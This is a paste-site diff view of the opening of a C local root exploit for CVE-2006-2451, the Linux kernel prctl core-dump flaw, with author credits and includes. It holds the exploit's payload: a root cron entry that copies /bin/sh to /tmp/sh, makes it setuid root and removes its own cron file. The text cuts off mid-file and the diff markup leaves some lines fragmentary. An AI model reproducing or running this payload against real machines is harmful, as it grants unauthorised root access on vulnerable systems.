SHOW:
|
|
- or go back to the newest paste.
| 1 | /*****************************************************/ | |
| 2 | /Name : rs_prctl_kernal.c */ | |
| 3 | /*Kernal Version : Linux >= 2.6.13 && < 2.6.17.4 */ | |
| 4 | /*CVE : CVE-2006-2451 */ | |
| 5 | /*Description : Linux Kernel PRCTL Core Dump Handling*/ | |
| 6 | /* Local r00t Exploit for: */ | |
| 7 | /* Linux Kernel PRCTL Core Dump Handling */ | |
| 8 | /* ( BID 18874 / CVE-2006-2451 ) */ | |
| 9 | /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ | |
| 10 | /* By: */ | |
| 11 | /* - dreyer <[email protected]> (main PoC code) */ | |
| 12 | /* - RoMaNSoFt <[email protected]> (local root code) */ | |
| 13 | /* [ 10.Jul.2006 ] */ | |
| 14 | /*****************************************************/ | |
| 15 | ||
| 16 | #include <stdio.h> | |
| 17 | #include <sys/time.h> | |
| 18 | #include <sys/resource.h> | |
| 19 | #include <unistd.h> | |
| 20 | #include <linux/prctl.h> | |
| 21 | - | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; |
| 21 | + | |
| 22 | #include <sys/types.h> | |
| 23 | - | int main() {
|
| 23 | + | |
| 24 | - | int child; |
| 24 | + | |
| 25 | - | struct rlimit corelimit; |
| 25 | + | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin: |
